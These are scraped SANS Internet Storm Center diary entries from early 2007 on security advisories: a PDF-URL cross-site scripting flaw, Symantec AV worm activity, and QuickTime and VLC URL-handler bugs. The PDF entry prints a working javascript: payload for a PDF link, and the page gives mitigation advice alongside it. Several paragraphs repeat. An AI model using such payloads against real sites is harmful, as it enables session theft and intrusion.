PDF XSS vulnerability announced at CCC
A new cross-site scripting attack was announced at the 23rd CCC by Stefano Di Paola & Giorgio Fedon:
http://events.ccc.de/congress/2006/Fahrplan/events/1602.en.html
The gist of the attack is that you are able to get javascript executed by simple having it appended to the PDF's URL.
This is an example (from GNU Citizen): (line breaks added for aesthetic value)
www.google.com/librariancenter/downloads/Tips_Tricks_85×11.pdf#something \
=javascript:function createXMLHttpRequest(){ try{ return new \
ActiveXObject('Msxml2.XMLHTTP'); }catch(e){} try{ return new \
ActiveXObject('Microsoft.XMLHTTP'); }catch(e){} try{ return new \
XMLHttpRequest(); }catch(e){} return null;}var xhr = createXMLHttpRequest(); \
xhr.onreadystatechange = function(){ if (xhr.readyState == 4) \
alert(xhr.responseText);};xhr.open('GET', 'http://www.google.com', true)\
;xhr.send(null);
http://events.ccc.de/congress/2006/Fahrplan/events/1602.en.html
The gist of the attack is that you are able to get javascript executed by simple having it appended to the PDF's URL.
This is an example (from GNU Citizen): (line breaks added for aesthetic value)
www.google.com/librariancenter/downloads/Tips_Tricks_85×11.pdf#something \
=javascript:function createXMLHttpRequest(){ try{ return new \
ActiveXObject('Msxml2.XMLHTTP'); }catch(e){} try{ return new \
ActiveXObject('Microsoft.XMLHTTP'); }catch(e){} try{ return new \
XMLHttpRequest(); }catch(e){} return null;}var xhr = createXMLHttpRequest(); \
xhr.onreadystatechange = function(){ if (xhr.readyState == 4) \
alert(xhr.responseText);};xhr.open('GET', 'http://www.google.com', true)\
;xhr.send(null);
This doesn't require the ability to write the PDF, just the ability to generate a URL that is based on a
PDF hosted on some site.
There are a number of good explanations on this. I liked this one:
http://www.disenchant.ch/blog/hacking-with-browser-plugins/34
The original paper talks about more than this specific flaw and is certainly worth reading as well.
Mitigation: Turning off javascript seems effective at mitigating this. Militant use of the NoScript extension for
Firefox would be my recommendation. Of course you have to turn off javascript for _everything_ (specifically the target domains, not the website setting up the attack. in the Disenchant examples you would have to disable scripting for Google, MySpace, Microsoft, Ebay and BofA) but....
Update: Thanks to those of you who pointed out that this appears to fail/is fixed in Adobe Acrobat/Reader 8:
http://www.adobe.com/products/acrobat/readstep2.html
Keywords:
0 comment(s)
Symantec attack uptick reported
Thanks to Mike who sent us the following note about what he's seen on his network. Anyone else seeing similar movement?
The Symantec AV attacks have picked up over the last day or so, as systems that were probably turned off over the holidays are turned on and infected by the worm. Almost all of the attacks we saw just before Christmas were from other .edus; now we are seeing more attacks from systems in countries other than the US. About 70% of the 186 systems that tried attacking us today were outside the US. Brazil and Taiwan take top honors for most attacking hosts.
The Symantec AV attacks have picked up over the last day or so, as systems that were probably turned off over the holidays are turned on and infected by the worm. Almost all of the attacks we saw just before Christmas were from other .edus; now we are seeing more attacks from systems in countries other than the US. About 70% of the 186 systems that tried attacking us today were outside the US. Brazil and Taiwan take top honors for most attacking hosts.
Keywords:
0 comment(s)
Apple QuickTime RTSP URL Handler Vulnerability
 The Month of the Apple bugs seems to have started. The first bug is in the handling of RTSP URL's within Quicktime, leading to arbitrary code execution on both Windows and Mac OS. You can find the advisory here:
http://projects.info-pull.com/moab/MOAB-01-01-2007.html. The MOAB blog states that you should disable the rtsp:// URL handler, however I have not determined how this is done.
Update 1:
Robert helped me find something I was missing. Guess I am just blind today or was just paying a little too much attention to the bowl games. To disable RTSP URLs in QuickTime, open the QuickTime control panel. Then, select the File Types tab. Expand the Streaming category and make sure the RTSP stream descriptor is unchecked. Here is a screen capture of this from my Windows based computer. I assume MacOS X computers have a similar control panel.  I recommend that you make sure that this is unchecked.Â
Keywords:
0 comment(s)
VLC Media Player udp URL handler Format String Vulnerability
Welcome Fans to Day Two of the Month of Apple Bugs!
http://projects.info-pull.com/moab/MOAB-02-01-2007.html
Today's contestants are: the MOAB team and VLC Media Player.
We have a special treat for you today as the vulnerability announced on this lovely Winter morning (okay, it hasn't stopped raining yet today and it was almost dark at 2:30pm and technically it's evening but...) impacts the VLC Media Player on both OSX and Windows.
MOAB team, the reigning champion after their highly noted win against Apple Quicktime yesterday by stack overflow had this to say about their opponent-
"A format string vulnerability exists in the handling of the udp:// URL handler. By supplying a specially crafted string, a remote attacker could cause an arbitrary code execution condition, under the privileges of the user running VLC."
After a short bout MOAB was declared winner again by delivery of PoC for both x86 and PPC.
This contender has certainly come out strong but we'll see how they hold up as the month continues. That's all till next time sports fans.
0 comment(s)
http://projects.info-pull.com/moab/MOAB-02-01-2007.html
Today's contestants are: the MOAB team and VLC Media Player.
We have a special treat for you today as the vulnerability announced on this lovely Winter morning (okay, it hasn't stopped raining yet today and it was almost dark at 2:30pm and technically it's evening but...) impacts the VLC Media Player on both OSX and Windows.
MOAB team, the reigning champion after their highly noted win against Apple Quicktime yesterday by stack overflow had this to say about their opponent-
"A format string vulnerability exists in the handling of the udp:// URL handler. By supplying a specially crafted string, a remote attacker could cause an arbitrary code execution condition, under the privileges of the user running VLC."
After a short bout MOAB was declared winner again by delivery of PoC for both x86 and PPC.
This contender has certainly come out strong but we'll see how they hold up as the month continues. That's all till next time sports fans.
×
![modal content]()
Diary Archives
© 2025 SANS™ Internet Storm Center
Developers: We have an API for you! 
Comments